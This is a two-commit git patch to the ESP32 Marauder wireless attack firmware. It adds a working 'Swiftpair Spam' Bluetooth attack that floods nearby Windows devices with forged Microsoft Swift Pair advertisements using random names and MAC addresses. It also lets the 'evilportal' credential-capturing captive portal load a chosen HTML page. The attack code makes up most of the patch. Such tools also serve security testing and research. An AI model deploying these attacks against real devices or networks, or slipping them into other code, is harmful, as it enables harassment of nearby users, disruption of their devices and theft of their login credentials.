From 66d0ae467dfe58b1a545fb654cb5eff41badbc11 Mon Sep 17 00:00:00 2001 From: Just Call Me Koko Date: Tue, 17 Oct 2023 16:18:03 -0400 Subject: [PATCH 1/2] Add Swiftpair spam --- esp32_marauder/CommandLine.cpp | 26 ++++++- esp32_marauder/CommandLine.h | 4 +- esp32_marauder/EvilPortal.cpp | 2 +- esp32_marauder/EvilPortal.h | 2 + esp32_marauder/MenuFunctions.cpp | 7 ++ esp32_marauder/WiFiScan.cpp | 121 +++++++++++++++++++++++++++++++ esp32_marauder/WiFiScan.h | 5 ++ esp32_marauder/configs.h | 2 +- 8 files changed, 165 insertions(+), 4 deletions(-) diff --git a/esp32_marauder/CommandLine.cpp b/esp32_marauder/CommandLine.cpp index c4ac82fca..0ccaa9d70 100644 --- a/esp32_marauder/CommandLine.cpp +++ b/esp32_marauder/CommandLine.cpp @@ -250,6 +250,7 @@ void CommandLine::runCommand(String input) { #ifdef HAS_BT Serial.println(HELP_BT_SNIFF_CMD); Serial.println(HELP_BT_SOUR_APPLE_CMD); + Serial.println(HELP_BT_SWIFTPAIR_SPAM_CMD); #ifdef HAS_GPS Serial.println(HELP_BT_WARDRIVE_CMD); #endif @@ -482,6 +483,7 @@ void CommandLine::runCommand(String input) { // AP Scan else if (cmd_args.get(0) == EVIL_PORTAL_CMD) { int cmd_sw = this->argSearch(&cmd_args, "-c"); + int html_sw = this->argSearch(&cmd_args, "-w"); if (cmd_sw != -1) { String et_command = cmd_args.get(cmd_sw + 1); @@ -491,6 +493,14 @@ void CommandLine::runCommand(String input) { display_obj.clearScreen(); menu_function_obj.drawStatusBar(); #endif + if (html_sw != -1) { + String target_html_name = cmd_args.get(html_sw + 1); + evil_portal_obj.target_html_name = target_html_name; + Serial.println("Set html file as " + evil_portal_obj.target_html_name); + } + //else { + // evil_portal_obj.target_html_name = "index.html"; + //} wifi_scan_obj.StartScan(WIFI_SCAN_EVIL_PORTAL, TFT_MAGENTA); } else if (et_command == "reset") { @@ -500,7 +510,9 @@ void CommandLine::runCommand(String input) { } else if (et_command == "sethtml") { - + String target_html_name = cmd_args.get(cmd_sw + 2); + evil_portal_obj.target_html_name = target_html_name; + Serial.println("Set html file as " + evil_portal_obj.target_html_name); } else if (et_command == "setap") { @@ -784,6 +796,18 @@ void CommandLine::runCommand(String input) { Serial.println("Bluetooth not supported"); #endif } + else if (cmd_args.get(0) == BT_SWIFTPAIR_SPAM_CMD) { + #ifdef HAS_BT + Serial.println("Starting Swiftpair Spam attack. Stop with " + (String)STOPSCAN_CMD); + #ifdef HAS_SCREEN + display_obj.clearScreen(); + menu_function_obj.drawStatusBar(); + #endif + wifi_scan_obj.StartScan(BT_ATTACK_SWIFTPAIR_SPAM, TFT_CYAN); + #else + Serial.println("Bluetooth not supported"); + #endif + } // Wardrive else if (cmd_args.get(0) == BT_WARDRIVE_CMD) { #ifdef HAS_BT diff --git a/esp32_marauder/CommandLine.h b/esp32_marauder/CommandLine.h index 157e57973..c2bff8b1f 100644 --- a/esp32_marauder/CommandLine.h +++ b/esp32_marauder/CommandLine.h @@ -78,6 +78,7 @@ const char PROGMEM SSID_CMD[] = "ssid"; // Bluetooth sniff/scan const char PROGMEM BT_SNIFF_CMD[] = "sniffbt"; const char PROGMEM BT_SOUR_APPLE_CMD[] = "sourapple"; +const char PROGMEM BT_SWIFTPAIR_SPAM_CMD[] = "swiftpair"; const char PROGMEM BT_WARDRIVE_CMD[] = "btwardrive"; const char PROGMEM BT_SKIM_CMD[] = "sniffskim"; @@ -96,7 +97,7 @@ const char PROGMEM HELP_GPS_DATA_CMD[] = "gpsdata"; const char PROGMEM HELP_GPS_CMD[] = "gps [-g] "; // WiFi sniff/scan -const char PROGMEM HELP_EVIL_PORTAL_CMD[] = "evilportal [-c start]"; +const char PROGMEM HELP_EVIL_PORTAL_CMD[] = "evilportal [-c start [-w html.html]/sethtml ]"; const char PROGMEM HELP_SIGSTREN_CMD[] = "sigmon"; const char PROGMEM HELP_SCANAP_CMD[] = "scanap"; const char PROGMEM HELP_SCANSTA_CMD[] = "scansta"; @@ -124,6 +125,7 @@ const char PROGMEM HELP_SSID_CMD_B[] = "ssid -r "; // Bluetooth sniff/scan const char PROGMEM HELP_BT_SNIFF_CMD[] = "sniffbt"; const char PROGMEM HELP_BT_SOUR_APPLE_CMD[] = "sourapple"; +const char PROGMEM HELP_BT_SWIFTPAIR_SPAM_CMD[] = "swiftpair"; const char PROGMEM HELP_BT_WARDRIVE_CMD[] = "btwardrive [-c]"; const char PROGMEM HELP_BT_SKIM_CMD[] = "sniffskim"; const char PROGMEM HELP_FOOT[] = "=================================="; diff --git a/esp32_marauder/EvilPortal.cpp b/esp32_marauder/EvilPortal.cpp index 86c5b8c26..c55b783c5 100644 --- a/esp32_marauder/EvilPortal.cpp +++ b/esp32_marauder/EvilPortal.cpp @@ -65,7 +65,7 @@ void EvilPortal::setupServer() { bool EvilPortal::setHtml() { Serial.println("Setting HTML..."); #ifndef WRITE_PACKETS_SERIAL - File html_file = sd_obj.getFile("/index.html"); + File html_file = sd_obj.getFile("/" + this->target_html_name); if (!html_file) { #ifdef HAS_SCREEN this->sendToDisplay("Could not find /index.html."); diff --git a/esp32_marauder/EvilPortal.h b/esp32_marauder/EvilPortal.h index 2e8923d68..19e3f7cb9 100644 --- a/esp32_marauder/EvilPortal.h +++ b/esp32_marauder/EvilPortal.h @@ -99,6 +99,8 @@ class EvilPortal { public: EvilPortal(); + String target_html_name = "index.html"; + String get_user_name(); String get_password(); void addLog(String log, int len); diff --git a/esp32_marauder/MenuFunctions.cpp b/esp32_marauder/MenuFunctions.cpp index e5151bd60..05f1c4539 100644 --- a/esp32_marauder/MenuFunctions.cpp +++ b/esp32_marauder/MenuFunctions.cpp @@ -495,6 +495,7 @@ void MenuFunctions::main(uint32_t currentTime) (wifi_scan_obj.currentScanMode == WIFI_ATTACK_BEACON_LIST) || (wifi_scan_obj.currentScanMode == BT_SCAN_ALL) || (wifi_scan_obj.currentScanMode == BT_ATTACK_SOUR_APPLE) || + (wifi_scan_obj.currentScanMode == BT_ATTACK_SWIFTPAIR_SPAM) || (wifi_scan_obj.currentScanMode == BT_SCAN_WAR_DRIVE) || (wifi_scan_obj.currentScanMode == BT_SCAN_WAR_DRIVE_CONT) || (wifi_scan_obj.currentScanMode == BT_SCAN_SKIMMERS)) @@ -552,6 +553,7 @@ void MenuFunctions::main(uint32_t currentTime) (wifi_scan_obj.currentScanMode == WIFI_ATTACK_BEACON_LIST) || (wifi_scan_obj.currentScanMode == BT_SCAN_ALL) || (wifi_scan_obj.currentScanMode == BT_ATTACK_SOUR_APPLE) || + (wifi_scan_obj.currentScanMode == BT_ATTACK_SWIFTPAIR_SPAM) || (wifi_scan_obj.currentScanMode == BT_SCAN_WAR_DRIVE) || (wifi_scan_obj.currentScanMode == BT_SCAN_WAR_DRIVE_CONT) || (wifi_scan_obj.currentScanMode == BT_SCAN_SKIMMERS) || @@ -1419,6 +1421,11 @@ void MenuFunctions::RunSetup() this->drawStatusBar(); wifi_scan_obj.StartScan(BT_ATTACK_SOUR_APPLE, TFT_GREEN); }); + this->addNodes(&bluetoothAttackMenu, "Swiftpair Spam", TFT_CYAN, NULL, KEYBOARD_ICO, [this]() { + display_obj.clearScreen(); + this->drawStatusBar(); + wifi_scan_obj.StartScan(BT_ATTACK_SWIFTPAIR_SPAM, TFT_CYAN); + }); // Device menu deviceMenu.parentMenu = &mainMenu; diff --git a/esp32_marauder/WiFiScan.cpp b/esp32_marauder/WiFiScan.cpp index ce378554d..f03346ef2 100644 --- a/esp32_marauder/WiFiScan.cpp +++ b/esp32_marauder/WiFiScan.cpp @@ -17,6 +17,11 @@ extern "C" int ieee80211_raw_frame_sanity_check(int32_t arg, int32_t arg2, int32 return 0; } +extern "C" { + uint8_t esp_base_mac_addr[6]; + esp_err_t esp_ble_gap_set_rand_addr(const uint8_t *rand_addr); +} + #ifdef HAS_BT //ESP32 Sour Apple by RapierXbox //Exploit by ECTO-1A @@ -48,6 +53,37 @@ extern "C" int ieee80211_raw_frame_sanity_check(int32_t arg, int32_t arg2, int32 return randomAdvertisementData; } + NimBLEAdvertisementData getSwiftAdvertisementData() { + extern WiFiScan wifi_scan_obj; + NimBLEAdvertisementData randomAdvertisementData = NimBLEAdvertisementData(); + const char* display_name = wifi_scan_obj.generateRandomName(); + uint8_t display_name_len = strlen(display_name); + + uint8_t size = 7 + display_name_len; + uint8_t* packet = (uint8_t*)malloc(size); + uint8_t i = 0; + + packet[i++] = size - 1; // Size + packet[i++] = 0xFF; // AD Type (Manufacturer Specific) + packet[i++] = 0x06; // Company ID (Microsoft) + packet[i++] = 0x00; // ... + packet[i++] = 0x03; // Microsoft Beacon ID + packet[i++] = 0x00; // Microsoft Beacon Sub Scenario + packet[i++] = 0x80; // Reserved RSSI Byte + for (int j = 0; j < display_name_len; j++) { + packet[i + j] = display_name[j]; + } + i += display_name_len; + + randomAdvertisementData.addData(std::string((char *)packet, size)); + + free(packet); + + free((void*)display_name); + + return randomAdvertisementData; + } + class bluetoothScanAllCallback: public BLEAdvertisedDeviceCallbacks { void onResult(BLEAdvertisedDevice *advertisedDevice) { @@ -447,6 +483,11 @@ void WiFiScan::StartScan(uint8_t scan_mode, uint16_t color) RunSourApple(scan_mode, color); #endif } + else if (scan_mode == BT_ATTACK_SWIFTPAIR_SPAM) { + #ifdef HAS_BT + RunSwiftpairSpam(scan_mode, color); + #endif + } else if ((scan_mode == BT_SCAN_WAR_DRIVE) || (scan_mode == BT_SCAN_WAR_DRIVE_CONT)) { #ifdef HAS_BT @@ -611,6 +652,7 @@ void WiFiScan::StopScan(uint8_t scan_mode) else if ((currentScanMode == BT_SCAN_ALL) || (currentScanMode == BT_ATTACK_SOUR_APPLE) || + (currentScanMode == BT_ATTACK_SWIFTPAIR_SPAM) || (currentScanMode == BT_SCAN_WAR_DRIVE) || (currentScanMode == BT_SCAN_WAR_DRIVE_CONT) || (currentScanMode == BT_SCAN_SKIMMERS)) @@ -1407,6 +1449,46 @@ void WiFiScan::executeSourApple() { #endif } +const char* WiFiScan::generateRandomName() { + const char* charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"; + int len = rand() % 10 + 1; // Generate a random length between 1 and 10 + char* randomName = (char*)malloc((len + 1) * sizeof(char)); // Allocate memory for the random name + for (int i = 0; i < len; ++i) { + randomName[i] = charset[rand() % strlen(charset)]; // Select random characters from the charset + } + randomName[len] = '\0'; // Null-terminate the string + return randomName; +} + +void WiFiScan::generateRandomMac(uint8_t* mac) { + for (int i = 0; i < 6; i++) { + mac[i] = random(0, 255); + } +} + +void WiFiScan::executeSwiftpairSpam() { + #ifdef HAS_BT + uint8_t macAddr[6]; + generateRandomMac(macAddr); + + esp_base_mac_addr_set(macAddr); + + NimBLEDevice::init(""); + + NimBLEServer *pServer = NimBLEDevice::createServer(); + + pAdvertising = pServer->getAdvertising(); + + NimBLEAdvertisementData advertisementData = getSwiftAdvertisementData(); + pAdvertising->setAdvertisementData(advertisementData); + pAdvertising->start(); + delay(10); + pAdvertising->stop(); + + NimBLEDevice::deinit(); + #endif +} + void WiFiScan::executeWarDrive() { #ifdef HAS_GPS if (gps_obj.getGpsModuleStatus()) { @@ -1781,6 +1863,26 @@ void WiFiScan::RunSourApple(uint8_t scan_mode, uint16_t color) { #endif } +void WiFiScan::RunSwiftpairSpam(uint8_t scan_mode, uint16_t color) { + #ifdef HAS_BT + #ifdef HAS_SCREEN + display_obj.TOP_FIXED_AREA_2 = 48; + display_obj.tteBar = true; + display_obj.print_delay_1 = 15; + display_obj.print_delay_2 = 10; + display_obj.initScrollValues(true); + display_obj.tft.setTextWrap(false); + display_obj.tft.setTextColor(TFT_BLACK, color); + display_obj.tft.fillRect(0,16,240,16, color); + display_obj.tft.drawCentreString("Swiftpair Spam",120,16,2); + display_obj.touchToExit(); + display_obj.tft.setTextColor(TFT_GREEN, TFT_BLACK); + #endif + + this->ble_initialized; + #endif +} + // Function to start running any BLE scan void WiFiScan::RunBluetoothScan(uint8_t scan_mode, uint16_t color) { @@ -4125,6 +4227,25 @@ void WiFiScan::main(uint32_t currentTime) this->executeSourApple(); #endif } + else if (currentScanMode == BT_ATTACK_SWIFTPAIR_SPAM) { + #ifdef HAS_BT + if (currentTime - initTime >= 1000) { + initTime = millis(); + String displayString = ""; + String displayString2 = ""; + displayString.concat("Advertising Data..."); + for (int x = 0; x < STANDARD_FONT_CHAR_LIMIT; x++) + displayString2.concat(" "); + #ifdef HAS_SCREEN + display_obj.tft.setTextColor(TFT_GREEN, TFT_BLACK); + display_obj.showCenterText(displayString2, 160); + display_obj.showCenterText(displayString, 160); + #endif + } + + this->executeSwiftpairSpam(); + #endif + } else if (currentScanMode == WIFI_SCAN_WAR_DRIVE) { if (currentTime - initTime >= this->channel_hop_delay * 1000) { diff --git a/esp32_marauder/WiFiScan.h b/esp32_marauder/WiFiScan.h index 6392388e6..b84856be6 100644 --- a/esp32_marauder/WiFiScan.h +++ b/esp32_marauder/WiFiScan.h @@ -82,6 +82,7 @@ #define BT_SCAN_WAR_DRIVE 34 #define BT_SCAN_WAR_DRIVE_CONT 35 #define BT_ATTACK_SOUR_APPLE 36 +#define BT_ATTACK_SWIFTPAIR_SPAM 37 #define GRAPH_REFRESH 100 @@ -251,7 +252,9 @@ class WiFiScan void clearMacHistory(); void executeWarDrive(); void executeSourApple(); + void executeSwiftpairSpam(); void startWardriverWiFi(); + void generateRandomMac(uint8_t* mac); void startWiFiAttacks(uint8_t scan_mode, uint16_t color, String title_string); @@ -284,6 +287,7 @@ class WiFiScan void RunPacketMonitor(uint8_t scan_mode, uint16_t color); void RunBluetoothScan(uint8_t scan_mode, uint16_t color); void RunSourApple(uint8_t scan_mode, uint16_t color); + void RunSwiftpairSpam(uint8_t scan_mode, uint16_t color); void RunLvJoinWiFi(uint8_t scan_mode, uint16_t color); void RunEvilPortal(uint8_t scan_mode, uint16_t color); bool checkMem(); @@ -346,6 +350,7 @@ class WiFiScan void main(uint32_t currentTime); void StartScan(uint8_t scan_mode, uint16_t color = 0); void StopScan(uint8_t scan_mode); + const char* generateRandomName(); //void addLog(String log, int len); static void getMAC(char *addr, uint8_t* data, uint16_t offset); diff --git a/esp32_marauder/configs.h b/esp32_marauder/configs.h index 8991d2b1a..af53a9893 100644 --- a/esp32_marauder/configs.h +++ b/esp32_marauder/configs.h @@ -22,7 +22,7 @@ //#define XIAO_ESP32_S3 //// END BOARD TARGETS - #define MARAUDER_VERSION "v0.13.1" + #define MARAUDER_VERSION "v0.13.2" //// BOARD FEATURES #ifdef MARAUDER_M5STICKC From 86c0857239eeea453ca004cb0b2a6eda16c44290 Mon Sep 17 00:00:00 2001 From: Just Call Me Koko Date: Tue, 17 Oct 2023 16:18:33 -0400 Subject: [PATCH 2/2] Increment version number --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index bc3f949f6..80b352255 100644 --- a/README.md +++ b/README.md @@ -3,7 +3,7 @@ -# ESP32 Marauder v0.13.1 +# ESP32 Marauder v0.13.2

Marauder logo

A suite of WiFi/Bluetooth offensive and defensive tools for the ESP32